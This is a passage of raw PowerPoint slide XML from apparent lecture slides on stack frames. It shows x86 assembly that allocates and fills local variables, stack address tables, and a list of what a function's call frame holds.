          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="378619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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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52081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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>
            <p:extLst/>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0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x6E</a:t>
                      </a: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93</a:t>
            </a:fld>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1953845" y="416179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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>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0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="378619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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="33279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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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850654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Frame</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph idx="1"/>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r>
                        <a:rPr lang="is-IS" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>…</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Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x41273333</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x6E</a:t>
                      </a:r>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94</a:t>
            </a:fld>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1953845" y="4161791"/>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3910385" y="18801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0x10000</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="11" name="Table 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="556352" y="4872992"/>
          <a:ext cx="3696160" cy="11125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r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x64</a:t>
                      </a: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0xFFF0</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">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r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x10000</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6246558" y="1692435"/>
            <a:ext cx="2897442" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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sub $0x10,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,-0xc(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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x64,-0x8(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$0x41273333,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>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,-0x4(</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add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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Right Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5873526" y="395504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1205950" y="348972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909812" y="221295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0xFFFC</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="TextBox 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909812" y="25913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0xFFF8</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909811" y="297156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0xFFF4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3909810" y="3327917"/>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0xFFF0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2050714"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370250" y="2406315"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="TextBox 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357946" y="2779828"/>
            <a:ext cx="2103019" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Right Arrow 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1202360" y="203872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121198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Frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allows us to allocate memory for the function's local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, when considering calling a function, what other information do we need?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our frame pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Return address (where to start program execution when function returns)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local variables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Temporary variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>95</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
